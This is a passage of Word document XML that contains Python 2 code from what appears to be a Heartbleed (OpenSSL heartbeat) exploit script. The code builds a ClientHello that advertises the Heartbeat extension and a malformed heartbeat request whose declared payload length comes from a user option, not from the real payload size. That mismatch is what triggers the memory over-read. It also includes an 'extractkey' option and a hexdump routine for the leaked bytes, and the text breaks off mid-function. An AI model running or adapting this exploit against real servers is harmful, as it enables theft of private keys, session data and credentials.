    <w:p w14:paraId="0CEA3A1C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="10C40331" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0x12, 0x00, 0x13, 0x00, 0x01, 0x00, 0x02,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABB190F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="06BD3F60" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0x03, 0x00, 0x0f, 0x00, 0x10, 0x00, 0x11,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25350112" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7D76D60B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve"># Extension: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SessionTicket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> TLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FE6146" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="03E6AF3F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0x23, 0x00, 0x00,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DDBE2E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2CD5D0B1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t># Extension: Heartbeat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B3D1F2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0A89FADF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0x0f, 0x00, 0x01, 0x01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A69FB33" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7ED6CA96" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1126CE63" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="18C8630A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>client_hello</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A8C3D84" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5120C459" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71196A8A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="771912A9" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>build_heartbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tls_ver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EDD834" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1A8C11A5" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    heartbeat = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8D96C0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="74DCF2E1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x18,       # Content Type (Heartbeat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5E853E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="542A7DC1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">0x03, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tls_ver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,  # TLS version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2733F8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6401AFA5" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0x29,  # Length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC4534" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="64B7A3D2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t># Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74149783" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="55056FD4" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x01,       # Type (Request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9FFFF1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="312A97EB" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/256, opts.len%256,  # Payload length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A12E444" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="51CBF2FF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183608DD" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6BFED329" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F7B3AC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1EB496FE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x41, 0x41, 0x41, 0x41, 0x41, 0x42, 0x43, 0x44,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11114905" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5F2B07E0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x45, 0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DA0C05" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="180BE805" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x4D, 0x4E, 0x4F, 0x41, 0x42, 0x43, 0x44, 0x45,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD0D73E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="35DE2DAE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C, 0x4D,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278B42FB" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="249557B3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x4E, 0x4F, 0x41, 0x42, 0x43, 0x44,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10523091" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3C1DE98B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>0x45, 0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62953C2E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1232A3E1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x4D, 0x4E, 0x4F, 0x41, 0x42, 0x43, 0x44, 0x45,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC5A92F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="28F83DA0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C, 0x4D,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5660FCE3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="61D28188" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x4E, 0x4F, 0x41, 0x42, 0x43, 0x44,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C01BEA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5BFBD438" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x45, 0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67095DFB" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6D6746C4" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x4D, 0x4E, 0x4F, 0x41, 0x42, 0x43, 0x44, 0x45,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E12AC37" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1D6579BF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C, 0x4D,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FC5DF7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="64ADB4CE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x4E, 0x4F, 0x41, 0x42, 0x43, 0x44,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FE2823" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0F56B6BC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x45, 0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAD130E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="66C0C1DF" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x4D, 0x4E, 0x4F, 0x41, 0x42, 0x43, 0x44, 0x45,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDA7449" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="56ABDA0D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C, 0x4D,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D91425" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="37E686BD" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x4E, 0x4F, 0x41, 0x42, 0x43, 0x44,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CBDC73" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="24D4EED0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x45, 0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DA5C89" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2F1CA560" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x4D, 0x4E, 0x4F, 0x41, 0x42, 0x43, 0x44, 0x45,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790110CA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="38EE0913" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C, 0x4D,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDEE2C4" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="67AE29E8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x4E, 0x4F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8A85AC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2036C98A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    ] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DE737E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2101AA1A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    return heartbeat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E76EB3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="648EBF43" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="534C5F4E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="33F117BE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="432896C9" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="072D70CB" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.rawoutfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754CD211" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1F23CA78" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rawfileOUT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = open(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.rawoutfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, "a")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1B0D79" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="17E0B76C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="22E96342" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6E919737" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.asciioutfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62631AAE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0F036F3D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asciifileOUT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = open(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.asciioutfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, "a")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CF2B77" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="53C31F77" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9AEAA6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7528DB03" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.extractkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B66F3E8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="77A7E1D2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.donotdisplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8F2D9F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="55D6222C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E9E41A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="31E0856C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(s):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6B611F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6B79906A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pdat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A62E84" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4F53491B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492871C4" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2FA147B1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    for b in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xrange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(0, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(s), 16):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594822D2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3F6CC41B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = [c for c in s[b : b + 16]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAC1647" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="46DF6CCC" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">        if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.hexdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045DA122" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="16FB52B8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hxdat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = ' '.join('%02X' % </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ord</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(c) for c in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A12D9E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3C5FD8E5" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pdat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = ''.join((c if 32 &lt;= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ord</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(c) &lt;= 126 else '.' )for c in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4410A282" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4D371C7C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += '  %04x: %-48s %s\n' % (b, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hxdat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
